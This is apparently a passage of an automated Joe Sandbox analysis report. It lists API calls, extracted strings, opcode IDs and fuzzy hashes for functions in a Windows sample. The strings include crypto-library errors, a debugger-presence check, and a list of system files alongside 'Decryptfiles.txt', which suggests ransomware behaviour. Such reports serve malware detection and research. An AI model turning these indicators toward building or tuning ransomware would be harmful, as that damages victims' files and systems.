                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 729b6c065977c17e03ca1433d0dce58e1665c5e3799eef571a6c3fe8e4dbe1de
                                                                                                      • Instruction ID: f6f018a25a3cab259d2ea33e124195d991565278c6064be550b9cc62f03cea09
                                                                                                      • Opcode Fuzzy Hash: 729b6c065977c17e03ca1433d0dce58e1665c5e3799eef571a6c3fe8e4dbe1de
                                                                                                      • Instruction Fuzzy Hash: AFE0BFB580C1AC9E8A21BF17BDC54853A62F7CA7443015216F4043F671D776161A9FC9
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E52132
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID: is not a valid key length$^
                                                                                                      • API String ID: 2659868963-1126833065
                                                                                                      • Opcode ID: 6ebc706ada398bdaf295b0085caa27a8d7838ec4d203dbb73b79122d13a6317e
                                                                                                      • Instruction ID: 6258828e11f7ae2088bb8a7caa48189dee4f00568e99d360202699eaa8e6e5e5
                                                                                                      • Opcode Fuzzy Hash: 6ebc706ada398bdaf295b0085caa27a8d7838ec4d203dbb73b79122d13a6317e
                                                                                                      • Instruction Fuzzy Hash: 0971E471A012089BDB18DF68CC41B9EFBB5EF86310F20861EE815B72D1E7B1A984CB50
                                                                                                      APIs
                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00EA02AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorHandling__start
                                                                                                      • String ID: pow
                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                      • Opcode ID: 9408378e3268c1f933c4f38663a5b0e659fa24f51da7c29705b2385d1c59faa3
                                                                                                      • Instruction ID: a54edf4517e6324b9b5c1c62d2f9f69a477f8470d0dc74d8a8aecd030c3db50a
                                                                                                      • Opcode Fuzzy Hash: 9408378e3268c1f933c4f38663a5b0e659fa24f51da7c29705b2385d1c59faa3
                                                                                                      • Instruction Fuzzy Hash: 14518A60D043018BCB117714C9053BA3BD0AB4B754F2CAD79F0917E1BADB35AC99DA47
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA73F2
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA7405
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: ,r
                                                                                                      • API String ID: 885266447-1997977556
                                                                                                      • Opcode ID: 9fd098a62717cd2753dd73dc36b4a6c3fb166c3707e02298af9f56955ee7e031
                                                                                                      • Instruction ID: d409bb43738d2feb36c0ecab672572353c4277b4fa0fcbff3028d645e2430be8
                                                                                                      • Opcode Fuzzy Hash: 9fd098a62717cd2753dd73dc36b4a6c3fb166c3707e02298af9f56955ee7e031
                                                                                                      • Instruction Fuzzy Hash: F5516971A04109AFCF18CF98CC81AAEBBF6EF89314F199159F895BB351D231AE44DB50
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E358C2
                                                                                                      Strings
                                                                                                      • CryptoMaterial: this object contains invalid values, xrefs: 00E357E7
                                                                                                      • CryptoMaterial: this object does not support precomputation, xrefs: 00E35845
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID: CryptoMaterial: this object contains invalid values$CryptoMaterial: this object does not support precomputation
                                                                                                      • API String ID: 2659868963-3364311089
                                                                                                      • Opcode ID: 4bff7f1d71c18fe2358776b83f0904e4f6005919c47c16c223ea776ff2336f2f
                                                                                                      • Instruction ID: 17d03527a18e2f0c5240d132f6a4d3513529408382cb8f6ac4e8aee19a96ecbe
                                                                                                      • Opcode Fuzzy Hash: 4bff7f1d71c18fe2358776b83f0904e4f6005919c47c16c223ea776ff2336f2f
                                                                                                      • Instruction Fuzzy Hash: D7417FB1900648EBC701DFA5D941FDAF7FCEB19710F10466AF825B7690EB74AA04CB50
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E51D92
                                                                                                      Strings
                                                                                                      • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 00E51CE4
                                                                                                      • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 00E51D12
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                                                                                      • API String ID: 2659868963-3345525433
                                                                                                      • Opcode ID: 28f70939701a44c466336821a0f75ba3a8a25359a3e636ba5b711b3a76d87157
                                                                                                      • Instruction ID: 2f9823ef8c8345ed72dacd8abfea4cc5e4ab320b6b6719f25834ec7a830a3c2f
                                                                                                      • Opcode Fuzzy Hash: 28f70939701a44c466336821a0f75ba3a8a25359a3e636ba5b711b3a76d87157
                                                                                                      • Instruction Fuzzy Hash: A341A371944608ABCB14EF94C841BDEF7F8FF05720F10566AE815B3251EBB5A504CB50
                                                                                                      APIs
                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E9155A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EncodePointer
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                      • Opcode ID: 70c9e6219beac55943e560449e56127faf435b28f5781909f80662e97c3ef986
                                                                                                      • Instruction ID: f022e9072d7db82a171c4afdd81b3406d877d7d9afa4b554266d2381c1f637d9
                                                                                                      • Opcode Fuzzy Hash: 70c9e6219beac55943e560449e56127faf435b28f5781909f80662e97c3ef986
                                                                                                      • Instruction Fuzzy Hash: E741797190020AAFCF15DF94CD81AEEBBB5FF48348F199099F90977252D3359A50DB50
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EAB2DF: _free.LIBCMT ref: 00EAB33F
                                                                                                        • Part of subcall function 00EAAF58: GetOEMCP.KERNEL32(00000000,00EAB1DF,?,00EA0C34,00EEDE9C,00EEDE9C,00EA0C34), ref: 00EAAF83
                                                                                                      • _free.LIBCMT ref: 00EAB23C
                                                                                                      • _free.LIBCMT ref: 00EAB272
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID: xh
                                                                                                      • API String ID: 269201875-2233559332
                                                                                                      • Opcode ID: 5901e13fcc7e8a108a0f0ab61f8c2b97af6777468e69eb6230530149ebc1c82a
                                                                                                      • Instruction ID: 2f799c5aceddd7ca300139ea0c109ee45ca1b480c2238776b72b004420309ce7
                                                                                                      • Opcode Fuzzy Hash: 5901e13fcc7e8a108a0f0ab61f8c2b97af6777468e69eb6230530149ebc1c82a
                                                                                                      • Instruction Fuzzy Hash: 2331B3719002499FCB11DFA9C884B9E7BF4BF4A324F15116AF814AF2A2D732AC54CB60
                                                                                                      APIs
                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00EAD7E5,00000000,00000050,?,?,?,?,?), ref: 00EAD665
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 0-711371036
                                                                                                      • Opcode ID: cb053902ff5abf975278ad4e8866bda4b3973da7ac195f59b275e7856ed05c01
                                                                                                      • Instruction ID: 322ad28623f62eb64cc69095500d4f4701c5fe5e5e78d2d27ce09dcf15d3c6db
                                                                                                      • Opcode Fuzzy Hash: cb053902ff5abf975278ad4e8866bda4b3973da7ac195f59b275e7856ed05c01
                                                                                                      • Instruction Fuzzy Hash: 47219562A08104E6D7249A548D05B9763A6EFDFB68F569564E90FFF500EB32FD40C290
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID: Hb
                                                                                                      • API String ID: 269201875-1270690246
                                                                                                      • Opcode ID: f5a02197b0bf904a1d46a7d456ef6c0518b8c0f286fa6a2f92aed21272f50b8f
                                                                                                      • Instruction ID: d4c8532de3e403c9d3b1f7901afcd8922ad85583c57be49fd9eaa2f58059efb2
                                                                                                      • Opcode Fuzzy Hash: f5a02197b0bf904a1d46a7d456ef6c0518b8c0f286fa6a2f92aed21272f50b8f
                                                                                                      • Instruction Fuzzy Hash: 8411E671A042444EDF349B29EE81B553294A797738F94262BF511FF6E0DBB0D8454391
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E31EAB
                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E31EFA
                                                                                                        • Part of subcall function 00E8C46F: _Yarn.LIBCPMT ref: 00E8C48E
                                                                                                        • Part of subcall function 00E8C46F: _Yarn.LIBCPMT ref: 00E8C4B2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 1908188788-1405518554
                                                                                                      • Opcode ID: 0103ff9ba9e4a9ed783b7a52eab3b3fe2e8b5e080df9de3a3ccd892bdcbfb635
                                                                                                      • Instruction ID: 2a1f48924f9fe77446d49b5a19603e1df7e332ccef429ae759b7d5ca108ca59f
                                                                                                      • Opcode Fuzzy Hash: 0103ff9ba9e4a9ed783b7a52eab3b3fe2e8b5e080df9de3a3ccd892bdcbfb635
                                                                                                      • Instruction Fuzzy Hash: D411E070904B849FD320CF68C801B47BBF4EF19710F004A1EE499D7B81D7B5A604CBA1
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E8C40B
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E8C466
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 593203224-2505862506
                                                                                                      • Opcode ID: d133bc4ee22e547d54edb35645f5f0837a0fac500d6054a3fa27d0fd61ad8088
                                                                                                      • Instruction ID: 43f737a1218f48c61b62d4b15b6c5ec1dd7d98cf4b013ee20c97e57b4a315a78
                                                                                                      • Opcode Fuzzy Hash: d133bc4ee22e547d54edb35645f5f0837a0fac500d6054a3fa27d0fd61ad8088
                                                                                                      • Instruction Fuzzy Hash: 1301B135600604AFCB04EF55CC51E6E7BB8EF85750B2440A9E91DAB361DF70EE41CBA0
                                                                                                      APIs
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00EA4E2A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                                      • String ID: InitializeCriticalSectionEx$`F
                                                                                                      • API String ID: 2593887523-1616480788
                                                                                                      • Opcode ID: 4db920e154dd8a7163978122dab95eaaf8cdf80c7b54a7a083dfecc1ad95da7b
                                                                                                      • Instruction ID: b0d8cbf09d84bc1431210b5268e4cc3b05fc2ac575206bc3c79225d886b7d1a4
                                                                                                      • Opcode Fuzzy Hash: 4db920e154dd8a7163978122dab95eaaf8cdf80c7b54a7a083dfecc1ad95da7b
                                                                                                      • Instruction Fuzzy Hash: 95F09071641218BBCB056F51ED02EAF7FA2EF49720F004118F819BA1A1CBB29921AA81
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Free
                                                                                                      • String ID: FlsFree$`F
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Alloc
                                                                                                      • String ID: FlsAlloc$`F
                                                                                                      APIs
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,00E9CCEE), ref: 00EA4D75
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Time$FileSystem
                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$`F
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E3ADE0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,00E8D498,?,?,?,00E31513), ref: 00E3ADE5
                                                                                                        • Part of subcall function 00E3ADE0: GetLastError.KERNEL32(?,?,?,00E31513), ref: 00E3ADEF
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00E31513), ref: 00E8D49C
                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E31513), ref: 00E8D4AB
                                                                                                      Strings
                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E8D4A6
                                                                                                      Similarity
                                                                                                      • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                      APIs
                                                                                                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,00E8BE82,00E38EA1,?,?,?,00E8BEB7,00E7853D,?,?,?,?,?,00E8C94E,00E7853D,00000001), ref: 00E8D169
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00E38EA1,?,?,00E8BE82,00E38EA1,?,?,?,00E8BEB7,00E7853D,?,?,?,?,?,00E8C94E), ref: 00E8D16D
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Time$FileSystem$Precise
                                                                                                      • String ID: `F
                                                                                                      APIs
                                                                                                      • TlsGetValue.KERNEL32(AB1AAB9C,00000000,?,?,?,?,?,7G,?,?,?,?,?,boot.inidesktop.inintuser.daticoncache.dbbootsect.bakntuser.dat.logBootfont.binDecryptfiles.txt,0000005F), ref: 00E4DA49
                                                                                                      • TlsGetValue.KERNEL32(00E4DDB0), ref: 00E4DADF
                                                                                                      • EnterCriticalSection.KERNEL32(?,00E4DDB0), ref: 00E4DB0C
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00E4DDB0), ref: 00E4DB6D
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionValue$EnterLeave
                                                                                                      • String ID: